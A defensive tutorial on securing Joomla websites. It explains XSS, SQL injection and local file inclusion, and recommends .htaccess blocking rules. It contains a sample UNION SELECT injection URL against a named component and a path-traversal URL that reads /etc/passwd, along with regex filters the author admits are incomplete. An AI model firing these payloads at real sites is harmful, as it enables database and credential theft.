This email address is being protected from spambots. You need JavaScript enabled to view it.

Joomla - How to secure your Joomla website advanced

.

There are many techniques how Joomla powered site (or any other site) can be hacked. Joomla is especially sensitive, as there is so many plugins and add-ons which contain unsecure code or even malicious code.

 

Most common hacking website techniques

1. XSS vulnerability: cross-site vulnerability is method of injecting malicious code through some input form: search form or entry field, comments entry field or any other input method. If script does not handle those attack's you have security issue.

 

2. SQL code injection: this is done by appending SQL code to the query string part of URL link. More on how to prevent SQL injection for MYSQL.

Example: index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id=-38+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1  5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,  32,33,34,35,36,37,38+--+

Bolded text is injected SQL code. This method can retrieve your username/password from the Joomla database or delete all records in the table.

Check for latest security 'holes' in Joomla on this site.

 

3. LFI injection: local file include: For example, Joomla 1.5.15 is vulnerable to this URL request: //index.php?option=com_content&view=frontpage&ltemid=../../../../../../../../../../../../../../../etc/passwd%00

This URL request fetches passwd file from Apache server. passwd file contains all user login account data of particular server.

 

How to protect your site from these attack's

Most important is to regularly update your Joomla installation to the latest release and every plugin you currently using.

Most powerful method to prevent these attacks is to use .htaccess file in your root directory:

1. Enable .htaccess: Joomla comes with htaccess.txt file, rename it to .htaccess

2. Check your Apache log, if you see attack (you can recognize attack by suspicious request), then block IP address or even whole IP address range. Add you blocked IP address on bottom of the .htaccess file. For example:

deny from 78.110.50.119
deny from 87.118.96.160
deny from 58.120.

Access is blocked for IP addresses 78.110.50.119, 87.118.96.160 and range of IP address from 58.120.0.0 to the 58.120.255.255

Note: crawler from yandex.ru (russian Google) is acting very suspicious, generating unnecessary network traffic and accessing pages with some odd parameters, e.g. /index.php?start=3. Form now on, yandex.ru is on my black list.

3. Write your own Conditions with RewriteCond command and put them before first RewriteCond statement in .htaccess file. See syntax of the RewriteCond statement and help on how to write RegExp.

 

Example on how to prevent LFI:

# block "../.". in query string...
RewriteCond %{QUERY_STRING} .*[.][.]/[.][.].* [OR]

# block "http://" in query string...
RewriteCond %{QUERY_STRING} .*http://.* [NC,OR]

 

Prevent SQL injection:

# block SQL INJECTION 'select'
RewriteCond %{QUERY_STRING} .*SELECT.* [NC,OR]

# block SQL INJECTION 'delete'
RewriteCond %{QUERY_STRING} .*DELETE.* [NC,OR]

# block SQL INJECTION 'jos_users'
RewriteCond %{QUERY_STRING} .*jos_users.* [NC,OR]

These statements will not provide 100% safety of your site but if you implement basic precautions as stated in my previous article on how to secure Joomla site + this + regularly update then your site will be hard to crack.

Note1: this is only valid for Linux hosted Joomla site

Note2: these restrictions can prevent some 'normal' scripts from running, if so, comment line by line until you find cause (comment by #)

 

4. Disable mailto component: as of 1.5.15 Joomla version I've noticed that /index.php/component/mailto/ path is on top of the list of the accessed paths/documents. Further more I've received admin email stating that email can not be delivered. I can not be sure, but I think that mailto component has some security issue that allows hackers to use it for spamming emails. Note: if you disable mailto component then some features (internal Joomla messaging) will not work any more

How to disable mailto component:

1. Disable Email icon from all articles. By default, all articles are having 'Show Email Icon' = Use Global Settings. To change this global settings, go to Article Manager, select all articles, then click on 'Parameters' button on right upper corner and set 'Show Email Icon' = False.

2. Rename mailto component: go to your Joomla root directory and enter /component, rename com_mailto to something else, e.g. old_com_mailto

3. Reset admin email account settings in Site/Global Configuration/System/Mail Settings. Set mailer to the SMTP server. This will produce error if someone tries to misuse mailto component.